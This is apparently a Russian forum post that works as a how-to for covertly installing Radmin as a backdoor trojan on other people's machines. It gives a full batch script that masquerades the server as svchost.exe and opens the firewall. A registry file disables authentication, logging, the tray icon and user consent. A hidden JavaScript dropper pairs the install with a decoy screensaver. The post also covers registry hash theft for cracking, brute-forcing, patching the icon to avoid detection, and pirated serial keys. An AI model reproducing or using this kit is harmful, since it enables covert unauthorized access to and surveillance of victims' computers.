Intro
Помниться, летом уже прошедшего года, появилось вполне здоровое желание потренироваться в области троян-хака и возыметь определенную власть в местной локалке. Начились раскопки тырнета на предмет осваивания современных троев. (Кстати, кто там искал пинча?
http://dkcs.void.ru/index.php?module=soft&page=troyans) . Именно тогда я заинтересовался радмином, а чуть позже узнал, что наш администратор именно с его помощью помогает бедным юзверям в их лам-делах. Какое совпадение =]
Как раз имено в то время в интернете начали появляться мануалы по установке\взлому радмина.
Просмотрев всё, что выплюнуло три поисковика, удалось собрать недетский хелп
http://sec-123.narod.ru/radmin/1.rar
Запомните, порой всё что вам надо, делает сам разработчик. Я не раз убеждался в этом.
Поэтому
READ THE FACKING MANUAL, мля !!! Где я и нашел практически всё, что нужно.
Дополнительная инфа из поисковиков добавило кучу вкусностей к пресному ману разработчика.
Почему именно Радмин?
1. Есть телнет, файловый менеджер, наблюдение и контроль за раб.столом, вкл\выкл компа.
2. Не палиться Касперским. НО УЧТИТЕ, что НОД его палит!!!
3. Возможность скрытой установки из консоли и малая палевность в системе.
4. Вобщем-то малый обём(не пинч конечно, но пайдёт)
5. Подержка прокси соединения на аналогичный радмин сервер(если ломать чужой радмин сервер).
Мы будем рассматривать версии от 2.0 до 2.2; они впринципе идентичные. Проги сами найдёте.
Привожу скучные коменты:
2.0
Serial_key: 08le-2jg4MggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk +ki2pQZHmM7lhysVBux8HE7udeSR0D1E0
2.1
Serial_key: 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA 6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23
2.2
Serial_key: 08mi6OFGZ7xOssk3ECduXquHrrfBQksiZK0BHfuF17GAXvJybP iTRTCm7tsnRkyGTs-VSDTEzQjAe7BtlsguDiq1
Радмин контролирует правильность и безопасность настройки серверной части программы. Radmin Server 2.2 не позволяет задать пустой пароль.
Интеллекуальная защита от подбора пароля и DoS-атак. В версии 2.2 добавлены такие меры защиты, как анти-хакерская задержка, блокирование подозрительных IP-адресов, и т. д
3.0
Текстовый чат
Голосовой чат
По поводу совметимости версий - главное, чтобы клиент(вы с него конектитесь) был не старее сервера(его вы имеете =] ).
В качестве клиента советую юзать 3-ю версию(есть сканер порта+иконки типа файла в фаловом менеджере, имхо вери удобно).
Я использую по сей день 2.0 сервак. Просто переделывать всё, что забацал на нём под другие версии просто влом =]
Все операции приведны для 2.0 сервера.
===============Скрытая Установка==================
+++++Введение++++++
Допустим, вы хакнули систему сплоитом(MS09-039_RPC-3, ms04-011, и др.) и смотрите на консоль с правами System.
Загрузим и запустим ниже рассмотренные файлы.
Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)
Между прочим, если просто стартануть сервак без всякой установки, он заработает!!! Вход без пароля.
Однако, тут же палит себя в трее. Чтобы этого не случилось, необходимо прописаться в реестре
Вот список ключей в реестре:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled" - авторизация по юзеру (0-входит любой)
"Parameter" - пароль
"DisableTrayIcon" - 0 - без иконки в трее
"Port" - (стандартный порт сервера 4899)
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - пкть к логфайлу
"FilterIp" - фильтр айпишников.
"AskUser" - 0 - не спрашивать у юзверя разрешение на взлом =]
Сам же сервер автогрузиться как служба.
+++++Настройки скриптов.+++++
Самый кайф в том, что сервак может запускаться из ЛЮБОГО места (хоть из C:\RECYCLER), лишь бы там же были AdmDll.dll и raddrv.dll.
И назвать его можно как угодно. Переименуем r_server.exe в svchost.exe .
Путём проб и ошибок были составлены следующие скриптики:
http://sec-123.narod.ru/radmin/4.rar
111.bat - автозапуск всего безобразия.
Сначала в правила встроенного в ХР фаервола добавляеться новое правило.
Затем извлекаються все записи из реестра в 123.reg про Радмин, если он был уже установлен.
Происходит автокопирование в системную папку(например, C:\Windows\).
Установки радмина обновляються на ваши(два варианта под 2000 и ХР)
Установка и запуск сервера.
Код:
@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
111.reg
Здесь в параметрах зашиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
- прописка лицензии для вечной работы =]
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28
===================№3 Взлом Сервера Радмина==================
Раскажу про способы.
++++Доступ к реестру++++
У многих компов разрешен доступ на чтение реестра!
Юзать надо так через командную строку.
Для хелпа наберите
reg /? - для ХР
regedit /? - для 2000
REG COPY \\ZODIAC\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker
Копирует все параметры раздела RAdmin с компьютера ZODIAC
в раздел HKLM\Software\Hacker на локальном компьютере.
Затем лезем к себе в реестр и копируем значение в *.txt файл.
HKLM\Software\Hacker\v2.0\Server\Parameters]
"Parameter"=??????????????????????????????????
Берем PasswordPRO, скармливаем ей наш txt-файл с паролем, выбирая алгоритм RADMIN, и ждём результата.
Кстати, если изменить пароль в реестре, изменение подействует без всяких перезагрузок сервера радмина.
И при следующем коннекте он будет уже действителен. Текущая сессия не прервётся при смене пароля.
+++++Подбор пароля++++
В инете мне попадалось на глаза всего два публичных радмин-брута.
Первый был на народе, но мне не посчастливилось его скачать - сайт прикрыли.
Есть второй вариант, по хуже, на зато рабочий. Выполнен на *.vbs скрипте.
Скорость фиговая, но для автоматизации перебора по словарю годиться.
Помните, что в 2.2 версии есть защитные механизмы от брута...
http://sec-123.narod.ru/radmin/2.rar
+++++Впаривание Радмина++++
Самый лучший способ - взять выше выложенные скрипты, оформить инструкции,
упаковать инсталлером с какой-нить прогой и впарить ламеру.
Вот, как это сделать без инсталлера.
Можно невидимо пустить bat-файл через ява-скрипт:
_README.js
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("111.bat",0);
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("screenseiver.scr",1);
Запуститься сначала установка радмина, а за ней какая-нить типа полезная прога.
http://sec-123.narod.ru/radmin/6.rar
+++++Как не спалиться++++
Если вы подобрали пароль на уже установленный радмин, советую заменить r_server.exe на пропатченную версию.
Дело в том, что иконка в трее при отсутствии соединений СИНЯЯ, а при наличии таковых - КРАСНАЯ.
Достаточно каким-либо редактором иконок поменять Красную на Синюю...
http://sec-123.narod.ru/radmin/5.rar
Учтите, иногда перезапуск сервиса радмина возможен только после перезагрузки системы. Такой вот глюк.
Также, убедитесь в отсутствии логирования в реестре(см. выше).
Для конспирации при впаривании можно зашифровать батник, или сконвертировать его в *.com (
http://sec-123.narod.ru/radmin/3.rar)
================================================
Ничего не забыл?...
Mega FAQ по Radmin'у
![Аватар для [Zarakul]](/avatars/avatar20806.gif){kind=avatar}
Линейный вид
